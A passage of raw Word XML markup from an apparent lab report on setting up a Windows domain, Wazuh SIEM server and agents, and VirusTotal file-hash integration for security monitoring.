        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Successfully logged in with domain user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E0B22A" w14:textId="6372F657" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771FE1FA" w14:textId="65FB14A4" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network &amp; Firewall Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D233E" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Network: </w:t>
      </w:r>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>All VMs connected to VMnet1 Host-only network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADB8E5" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B0BF3" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Disabled Windows Firewall on Host and all VMs temporarily during network and domain setup to avoid blocking traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D262C30" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Allowed ICMP (ping) and File and Printer Sharing for “Local Subnet” network profile in firewall rules (after testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7A0F24" w14:textId="6C53D6F4" w:rsidR="003276E6" w:rsidRPr="000F1E68" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B08321B" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="000F1E68" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A3D2E3" w14:textId="09F82026" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connectivity Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE1D37" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Verified successful ping between:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78139D25" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>Host machine &lt;-&gt; VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380904D" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="004449CF" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004449CF">
        <w:t>VM &lt;-&gt; VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C9731" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Verified nslookup WinServ.local resolves to 192.168.182.10 (DC IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0F5A3" w14:textId="77777777" w:rsidR="003276E6" w:rsidRPr="003276E6" w:rsidRDefault="003276E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003276E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Verified domain join without errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13570B81" w14:textId="77777777" w:rsidR="00631E6E" w:rsidRDefault="00631E6E" w:rsidP="003276E6"/>
    <w:p w14:paraId="3321FDD9" w14:textId="5B4458D7" w:rsidR="00ED1197" w:rsidRPr="00ED1197" w:rsidRDefault="00ED1197" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1197">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wazuh Server Setup :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01939B99" w14:textId="77777777" w:rsidR="00ED1197" w:rsidRPr="00ED1197" w:rsidRDefault="00ED1197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1197">
        <w:t>Installed Ubuntu 22.04 on VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C4DEE7" w14:textId="77777777" w:rsidR="00ED1197" w:rsidRPr="00ED1197" w:rsidRDefault="00ED1197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1197">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Installed Wazuh manager via official repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7FEBE" w14:textId="77777777" w:rsidR="00ED1197" w:rsidRDefault="00ED1197">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED1197">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configured /var/ossec/etc/ossec.conf for FIM, syscheck, alerts, and integrations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5961FB08" w14:textId="1EE8438A" w:rsidR="004521E8" w:rsidRDefault="004521E8" w:rsidP="004521E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29637D78" w14:textId="151E887D" w:rsidR="004521E8" w:rsidRDefault="004E1D6F" w:rsidP="004521E8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh Installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED69F2B" w14:textId="77777777" w:rsidR="004E1D6F" w:rsidRDefault="004E1D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Install Wazuh package from official Wazuh site </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download and run the Wazuh installation assistant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00337F39">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://documentation.wazuh.com/current/quickstart.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B1E80" w14:textId="7E814403" w:rsidR="004E1D6F" w:rsidRPr="004E1D6F" w:rsidRDefault="004E1D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Access the Wazuh web interface with https://&lt;WAZUH_DASHBOARD_IP_ADDRESS&gt; and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EDC8A7" w14:textId="77777777" w:rsidR="004E1D6F" w:rsidRPr="004E1D6F" w:rsidRDefault="004E1D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1D6F">
        <w:t>: admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7EEF69" w14:textId="2739B507" w:rsidR="004E1D6F" w:rsidRPr="004E1D6F" w:rsidRDefault="004E1D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1D6F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: &lt;ADMIN_PASSWORD&gt; ( after c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ompleting wazuh installation it will show)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB22A7" w14:textId="77777777" w:rsidR="00ED1197" w:rsidRDefault="00ED1197" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07AB637D" w14:textId="4FA8E7C7" w:rsidR="00A533F6" w:rsidRPr="00ED1197" w:rsidRDefault="00A533F6" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B7D07E" wp14:editId="254F8410">
            <wp:extent cx="6677025" cy="3009256"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="17418662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4018" cy="3021422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD575CB" w14:textId="692D5B66" w:rsidR="00A97D2F" w:rsidRPr="00A97D2F" w:rsidRDefault="00A97D2F" w:rsidP="00A97D2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97D2F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>VirusTotal Integration in Wazuh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714A504" w14:textId="192A79C0" w:rsidR="00A97D2F" w:rsidRPr="0013184B" w:rsidRDefault="00A97D2F" w:rsidP="00A97D2F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013184B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>What it does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B741B" w14:textId="77777777" w:rsidR="00A97D2F" w:rsidRPr="00A97D2F" w:rsidRDefault="00A97D2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97D2F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh agent detects file changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871E7A2" w14:textId="77777777" w:rsidR="00A97D2F" w:rsidRPr="00A97D2F" w:rsidRDefault="00A97D2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97D2F">
        <w:t>Suspicious files are analyzed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CFF1B2" w14:textId="77777777" w:rsidR="00A97D2F" w:rsidRPr="00A97D2F" w:rsidRDefault="00A97D2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97D2F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Wazuh sends hash to VirusTotal via API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1D4C1" w14:textId="799B4B6C" w:rsidR="008E02D0" w:rsidRPr="004521E8" w:rsidRDefault="00A97D2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97D2F">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If malicious, Wazuh alerts via dashboard (and optionally takes action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFFFD0" w14:textId="77777777" w:rsidR="00206A45" w:rsidRDefault="00206A45" w:rsidP="00E047F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0BB715" w14:textId="02E75CCE" w:rsidR="00E047F3" w:rsidRDefault="00E047F3" w:rsidP="00E047F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh Agent </w:t>
      </w:r>
      <w:r w:rsidRPr="000F1E68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Setup &amp; Configuration</w:t>
      </w:r>
      <w:r w:rsidR="00F3336E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A127F1" w14:textId="6E3614BD" w:rsidR="00F3336E" w:rsidRPr="0011181E" w:rsidRDefault="00206A45" w:rsidP="00F3336E">
      <w:pPr>
        <w:ind w:right="266"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011181E">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In our Wazuh server GUI</w:t>
      </w:r>
      <w:r w:rsidR="00F3336E" w:rsidRPr="0011181E">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC2163F" w14:textId="7761D816" w:rsidR="00F3336E" w:rsidRPr="00F3336E" w:rsidRDefault="00F3336E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3336E">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Install Wazuh agent on Ubuntu and Windows endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750554E" w14:textId="75A4E460" w:rsidR="00AC1FE6" w:rsidRPr="00AC1FE6" w:rsidRDefault="00AC1FE6" w:rsidP="00AC1FE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 1: Click on the "Deploy a new agent" module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E843813" w14:textId="51DA204C" w:rsidR="00AC1FE6" w:rsidRPr="00AC1FE6" w:rsidRDefault="00AC1FE6" w:rsidP="00AC1FE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 2: Select the operating system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9C8D49" w14:textId="3815F354" w:rsidR="00AC1FE6" w:rsidRPr="00AC1FE6" w:rsidRDefault="00AC1FE6" w:rsidP="00AC1FE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 3: Add the wazuh server's IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AADF4" w14:textId="3D24B0B0" w:rsidR="00AC1FE6" w:rsidRPr="00AC1FE6" w:rsidRDefault="00AC1FE6" w:rsidP="00AC1FE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 4: Select the agent name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA432E4" w14:textId="439B1B3E" w:rsidR="00AC1FE6" w:rsidRPr="00AC1FE6" w:rsidRDefault="00AC1FE6" w:rsidP="00AC1FE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Install the agent on the Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Server machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27FE2F" w14:textId="3070E20E" w:rsidR="00AC1FE6" w:rsidRPr="00AC1FE6" w:rsidRDefault="00AC1FE6" w:rsidP="00AC1FE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 6: Start the agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E7BA5E" w14:textId="3548C21D" w:rsidR="00A533F6" w:rsidRDefault="00AC1FE6" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1FE6">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 7: Check the agent's status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49882BE4" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2DE0C6" w14:textId="31653247" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BC8DD12" wp14:editId="68607DEE">
            <wp:extent cx="6637020" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6228767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2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4739F1" w14:textId="77777777" w:rsidR="00A533F6" w:rsidRDefault="00A533F6" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D60C6B" w14:textId="0986A473" w:rsidR="00B9630D" w:rsidRDefault="00B9630D" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B9630D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusTotal integration with Wazuh server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ABC922" w14:textId="2F415AD5" w:rsidR="00B9630D" w:rsidRDefault="00B9630D" w:rsidP="00206A45">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In Wazuh server</w:t>
      </w:r>
      <w:r w:rsidR="000A722E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6640A9" w14:textId="78990707" w:rsidR="009E633B" w:rsidRPr="004449CF" w:rsidRDefault="009E633B" w:rsidP="009E633B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>1-</w:t>
      </w:r>
      <w:r w:rsidR="00901DC7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00206A45" w:rsidRPr="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configure</w:t>
      </w:r>
      <w:r w:rsidR="000A722E" w:rsidRPr="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/ossec/etc/ossec.conf</w:t>
      </w:r>
      <w:r w:rsidR="00206A45" w:rsidRPr="009E633B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to include:</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B9630D" w:rsidRPr="00AD2791" w14:paraId="36119AB3" w14:textId="77777777" w:rsidTr="00AA264C">
        <w:tc>
          <w:tcPr>
